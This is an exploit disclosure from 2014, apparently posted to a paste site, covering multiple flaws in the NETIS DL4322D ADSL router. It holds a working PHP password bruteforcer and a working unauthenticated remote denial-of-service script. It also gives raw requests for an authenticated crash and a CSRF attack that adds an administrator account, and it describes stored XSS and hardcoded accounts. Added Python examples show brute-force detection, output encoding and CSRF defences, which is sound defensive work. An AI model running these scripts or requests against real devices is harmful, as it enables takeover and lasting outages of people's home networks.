NETIS 0day

a guest
Oct 16th, 2014
Vulnerable Device:
NETIS DL4322D 300Mbps Wireless N ADSL2+ Modem Router Multiple vulnerabilities
(Other netis models may also suffer from these vulns)
Vendor: http://www.netis-systems.com
Product overview:
http://www.netis-systems.com/en/products/ADSL2+-Wireless-Modem-Router/941.html

The netis DL4322D is a 3-in-1 device that combines the functions of a high speed ADSL2+ modem, 4-port NAT router and wireless N access point. It is designed to provide end-users with a one-stop solution to acquiring and sharing high-speed Internet access over a wired/wireless network. Supporting the latest ADSL standards, the DL4322D brings with it much higher speed than dial-up connections. It also provides some practical functions, such as Port Mapping for IPTV, Ethernet WAN, SNMP, IPv6, TR-069 and more. With this product, users can now enjoy more kinds of heavy bandwidth consuming applications like wireless HD video streaming.


===================================
Vulns: Bruteforce/XSS/Denial Of Service(Unauthenticated/Authenticated)/CSRF/
Plaintext Passwords/Hardcoded Usernames

===================================
0) Bruteforce on login page:
http://192.168.1.1/login.cgi
There is no anti-bruteforce mechanism at all (not even a CAPTCHA),
so the login page is vulnerable to bruteforce.

=========== BRUTEFORCER ============

<?php
// Dictionary attack against the DL4322D login form. The router answers a
// failed attempt with the text "Username or password error"; the absence of
// that string in the reply is taken as a successful login.
$page='login.cgi';
$usage='~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL . 'Usage:'. PHP_EOL .
'php -f brute.php guest/user /tmp/dictionary.txt http://192.168.1.1/'. PHP_EOL . '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL;
if(count($argv)!==4) die($usage);
$uname=$argv[1];        // one of the two hardcoded accounts: guest or user
$passmassiv=$argv[2];   // path to the wordlist, one password per line
$ip=$argv[3];           // base URL of the router, with trailing slash
$page=$ip . $page;
$passmassiv=file($passmassiv) or die('Unable to open dictionary!');

foreach($passmassiv as $pass)
{
    $pass=trim($pass);
    // Same field names the login form itself submits (including the odd submit.htm?login.htm key).
    $post='username=' . $uname.'&password=' .$pass . '&submit.htm%3Flogin.htm=Send';

    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$page);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_POST, true);   // original passed sizeof($post); CURLOPT_POST takes a boolean
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    $response=curl_exec($ch);
    curl_close($ch);
    // A failed connection returns false, which must not be mistaken for a hit.
    if($response===false) die('Connection to ' . $page . ' failed!' . PHP_EOL);

    if(!preg_match('/Username or password error/i',$response))
    {
        echo 'OWNED! ' . $uname . ' PASSWD: ' . $pass. PHP_EOL;
        exit;
    }
    else
    {
        echo ' Verifying user: => ' . $uname . ' TRYING AS PASS:=> ' . $pass. PHP_EOL;
    }
}

unset($pass);

?>

======== EOF BRUTEFORCER ==============
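From the defender's side, the counterpart to the script above is noticing the burst of POSTs to login.cgi. The following Python is an added example (not part of the advisory and not the router's code) that runs a sliding-window count over constructed access-log lines; the log line format is an assumption, e.g. from a proxy or IDS in front of the router, since the device itself shows no such log here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: <client ip> <ISO timestamp> "<method> <path>" <status> <bytes>.
# One host hammers login.cgi six times in four seconds; another logs in normally.
SAMPLE_LOG = """\
192.168.1.102 2014-10-15T22:40:01 "POST /login.cgi" 200 1832
192.168.1.102 2014-10-15T22:40:02 "POST /login.cgi" 200 1832
192.168.1.102 2014-10-15T22:40:02 "POST /login.cgi" 200 1832
192.168.1.102 2014-10-15T22:40:03 "POST /login.cgi" 200 1832
192.168.1.102 2014-10-15T22:40:03 "POST /login.cgi" 200 1832
192.168.1.102 2014-10-15T22:40:04 "POST /login.cgi" 200 1832
192.168.1.50 2014-10-15T22:41:10 "POST /login.cgi" 200 1832
192.168.1.50 2014-10-15T22:47:30 "POST /login.cgi" 302 0
192.168.1.77 2014-10-15T22:50:00 "GET /login.htm" 200 2210
this line is garbage and must not crash the detector
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<ts>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) \d+$')

def parse_log(text):
    """Yield (ip, timestamp, method, path, status); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (m['ip'], datetime.fromisoformat(m['ts']), m['method'],
                   m['path'], int(m['status']))

def login_bursts(text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: total_attempts} for every source that POSTed to /login.cgi
    at least `threshold` times inside any sliding `window`. Attempts are
    counted regardless of status code, since the bruteforcer above tells
    success from failure by body text, not by status."""
    by_ip = defaultdict(list)
    for ip, ts, method, path, _ in parse_log(text):
        if method == 'POST' and path == '/login.cgi':
            by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop attempts older than the window
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged
```

Running `login_bursts(SAMPLE_LOG)` flags only 192.168.1.102; the two spaced-out attempts from 192.168.1.50 stay below the threshold.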




===================================
1) XSS via incorrect login:password attempts.

Since the web interface of this device is open to the PUBLIC by default, there is a big chance of being owned.
The device is able to log incorrect login:password attempts, but it fails to sanitise the user input before storing it in the log, and the administrator can view this log.
Once the administrator views the injected log entries via the web interface, it is game over.
Exploitation:
Use the XSS to redirect the admin to a 3rd-party site, or exploit the CSRF flaws (it is up to you): add a new admin, put the remote machine into the DMZ, etc., then log on to the device.

SEE: XSS.png && unsanitized_input_passed.png

http://s017.radikal.ru/i400/1410/84/a50fc523715a.jpg
http://s50.radikal.ru/i130/1410/d3/dc9606d635a2.jpg

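The fix for 1) is output encoding in the log viewer. Below is an added Python example, not the vendor's firmware, that models the flaw: a renderer that pastes the submitted username straight into the admin's log page (vulnerable) beside one that HTML-escapes it at output time (fixed). The function names and the sample log entries are constructed.

```python
import html

# Constructed log entries: what two login attempts submitted as the username.
SAMPLE_ATTEMPTS = [
    {'user': 'guest ', 'ip': '192.168.1.50'},                       # harmless typo
    {'user': '<script>alert(1)</script>', 'ip': '192.168.1.102'},   # stored-XSS probe
]

def render_log_vulnerable(entries):
    """Model of the router's behaviour: the admin's log page is built by
    concatenating the stored username into the markup, so any tag typed at
    the login prompt runs in the admin's browser when the log is viewed."""
    rows = ''.join(f"<tr><td>{e['user']}</td><td>{e['ip']}</td></tr>"
                   for e in entries)
    return f"<table>{rows}</table>"

def render_log_fixed(entries):
    """Same page with output encoding: every untrusted value is entity-encoded
    at the point it is written into HTML, so the probe is displayed as text.
    Encoding at render time (not when the log is written) keeps the stored
    log searchable and lets other sinks apply their own encoding."""
    rows = ''.join(f"<tr><td>{html.escape(e['user'], quote=True)}</td>"
                   f"<td>{html.escape(e['ip'], quote=True)}</td></tr>"
                   for e in entries)
    return f"<table>{rows}</table>"

def leaks_script_tag(page):
    """Demo check: does a raw <script> tag from user data survive in the page?"""
    return '<script' in page.lower()
```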
===================================
2) Remote Unauthenticated Denial Of Service Exploit.
Since the web interface is open to the PUBLIC (default):


<?php
error_reporting(0);//On production lol
/*******************************************
* NETIS DL4322D Unauthenticated *
* Remote DENIAL OF SERVICE EXPLOIT *
* /AkaStep *
* On success this exploit simply *
* reboots target's router *
* (Connections will be interrupted as well)*
* *****************************************/

$page='login.cgi';
$usage='~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL . 'NETIS DL4322D REMOTE DENIAL OF SERVICE EXPLOIT'. PHP_EOL .
'Usage:'. PHP_EOL .
'php -f netisdos.php http://REMOTE_OR_LOCAL_IP/'. PHP_EOL . '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'. PHP_EOL;
if(count($argv)!==2) die($usage);

$ip=$argv[1];       // base URL of the router, with trailing slash
$page=$ip . $page;

// Reachability check before sending anything.
if(file_get_contents($ip . 'login.htm')) echo '[+] Target is Online! [+]'. PHP_EOL;
sleep(3);
echo '[+] Sending Payload! [+]'. PHP_EOL;
sleep(3);

// The oversized username submitted to the login handler is what takes the device down.
$payload=str_repeat('AKASTEP',500);
$post='username=' . $payload.'&password=SAY HELLO TO BLACK HATS!&submit.htm%3Flogin.htm=Send';

$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$page);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 12);   // the router stops answering mid-request when it goes down
curl_setopt($ch, CURLOPT_POST, true);    // original passed sizeof($post); CURLOPT_POST takes a boolean
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
$response=curl_exec($ch);
echo '[+] Payload WAS Sent... Please wait... [+]' .PHP_EOL;
curl_close($ch);
sleep(2);

// If login.cgi no longer answers, the device is rebooting.
if(!file_get_contents($page)) echo('[+] Remote Target Down! [+]'. PHP_EOL);
exit;

?>





===================================
3) DOS (Authenticated) but can be combined with XSS+CSRF remotely.

http://192.168.1.1/form2languageSelect.cgi

HEADERS:

Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
If-Modified-Since: *


DATA:
selectLanguage=100&submit.htm%3Findex.htm=Send


NOTE: Value 100 is an illegal value that causes Denial Of Service.
Any current connection(s) will be broken permanently.

[root@ metasploit]# nmap -sS -Pn 192.168.1.1 -p 80

Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-15 22:59 AZST
Nmap done: 1 IP address (0 hosts up) scanned in 0.46 seconds
[root@ metasploit]# nmap -sS -sU -PN -sV 192.168.1.1

Starting Nmap 6.45 ( http://nmap.org ) at 2014-10-15 23:02 AZST
Nmap done: 1 IP address (0 hosts up) scanned in 0.92 seconds
[root@ metasploit]# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.


Moreover, after switching the device off and on (multiple hard reboots), any attempt to access the web interface still results in Denial Of Service (the device somehow stays poisoned indefinitely).


[root@ metasploit]# ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
From 192.168.1.102 icmp_seq=17 Destination Host Unreachable
From 192.168.1.102 icmp_seq=18 Destination Host Unreachable
From 192.168.1.102 icmp_seq=19 Destination Host Unreachable
From 192.168.1.102 icmp_seq=20 Destination Host Unreachable
From 192.168.1.102 icmp_seq=21 Destination Host Unreachable
From 192.168.1.102 icmp_seq=22 Destination Host Unreachable
From 192.168.1.102 icmp_seq=23 Destination Host Unreachable
From 192.168.1.102 icmp_seq=24 Destination Host Unreachable
From 192.168.1.102 icmp_seq=25 Destination Host Unreachable
From 192.168.1.102 icmp_seq=26 Destination Host Unreachable
From 192.168.1.102 icmp_seq=27 Destination Host Unreachable
From 192.168.1.102 icmp_seq=28 Destination Host Unreachable
From 192.168.1.102 icmp_seq=29 Destination Host Unreachable
From 192.168.1.102 icmp_seq=30 Destination Host Unreachable
From 192.168.1.102 icmp_seq=31 Destination Host Unreachable
From 192.168.1.102 icmp_seq=32 Destination Host Unreachable
From 192.168.1.102 icmp_seq=33 Destination Host Unreachable
From 192.168.1.102 icmp_seq=34 Destination Host Unreachable
From 192.168.1.102 icmp_seq=35 Destination Host Unreachabl



==========================================================================

4)
Multiple CSRF vulns: (all forms are prone to CSRF because there is no ANTI-CSRF implementation at all)

Here is one, transmitted VIA POST request:

URL:
http://192.168.1.1/form2userconfig.cgi


REQUEST HEADERS:

Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
If-Modified-Since: *


DATA TO POST:

username=owned_device&privilege=2&newpass=aDhexLbT8&confpass=aDhexLbT8&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send


SEE: CSRF_VULNERABLE_FORMS.png

http://s019.radikal.ru/i632/1410/3b/2d738ae75ec5.jpg

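What the handlers behind 3) and 4) are missing is shown in the added Python example below (not the vendor's code): an anti-CSRF token bound to the session and verified on every form POST, plus whitelist validation of selectLanguage so a value like 100 is rejected before it reaches the firmware. The field names are the ones captured above; the csrf_token field, the allowed language indices and the server secret are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Per-boot server secret (assumption; a real device would keep one in RAM).
SERVER_SECRET = secrets.token_bytes(32)
# Language indices the UI actually offers (assumption: 0-3). Anything else,
# including the advisory's 100, is rejected before it reaches the firmware.
ALLOWED_LANGUAGES = {'0', '1', '2', '3'}

def csrf_token(session_id):
    """Anti-CSRF token bound to the session cookie: HMAC(secret, SessionID).
    A page on another origin cannot read it, so it cannot forge the POST."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def handle_post(path, session_id, body):
    """Validate one form POST; returns (http_status, message)."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    # 1) CSRF check first, for every form. compare_digest on bytes avoids
    #    both timing leaks and a TypeError on non-ASCII attacker input.
    supplied = form.get('csrf_token', '').encode()
    if not hmac.compare_digest(supplied, csrf_token(session_id).encode()):
        return 403, 'missing or invalid anti-CSRF token'
    # 2) Per-handler whitelist validation.
    if path == '/form2languageSelect.cgi':
        if form.get('selectLanguage') not in ALLOWED_LANGUAGES:
            return 400, 'selectLanguage out of range'
        return 200, 'language updated'
    if path == '/form2userconfig.cgi':
        if form.get('newpass', '') != form.get('confpass', ''):
            return 400, 'password confirmation mismatch'
        return 200, 'user config updated'
    return 404, 'unknown form'

# Constructed demo: the captured user-config body above carries no token.
CAPTURED_BODY = ('username=owned_device&privilege=2&newpass=aDhexLbT8&confpass=aDhexLbT8'
                 '&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send')

if __name__ == '__main__':
    sid = 'demo-session'
    print(handle_post('/form2userconfig.cgi', sid, CAPTURED_BODY))          # 403
    print(handle_post('/form2userconfig.cgi', sid,
                      CAPTURED_BODY + '&csrf_token=' + csrf_token(sid)))    # 200
    print(handle_post('/form2languageSelect.cgi', sid,
                      'selectLanguage=100&csrf_token=' + csrf_token(sid)))  # 400
```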
==========================================================================
5)

Plaintext passwords


SEE: PLAINTEXT_PASSWORDS_FROM_SOURCE_OF_PAGE.png

http://s008.radikal.ru/i306/1410/88/be4c3e20fa10.jpg

==========================================================================

6) Hardcoded usernames.

This device has 2 hardcoded accounts:
guest and user
guest <= it has root privilege
user <= is a limited user

You can change passwords for them but you can't delete or rename them.
==========================================================================


===================== WITH LOVE FROM AZERBAIJAN ========================

packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us
exploit-db.com
insecurety.net
millikuvvetler.net
b3yaz.org

Special respects to CAMOUFL4G3 && Brendan Coles && ottoman38 && Ferid23 && Sexavet and to all
Azerbaijan Black hatz, Aa team && to All Turkish hackers.

/AkaStep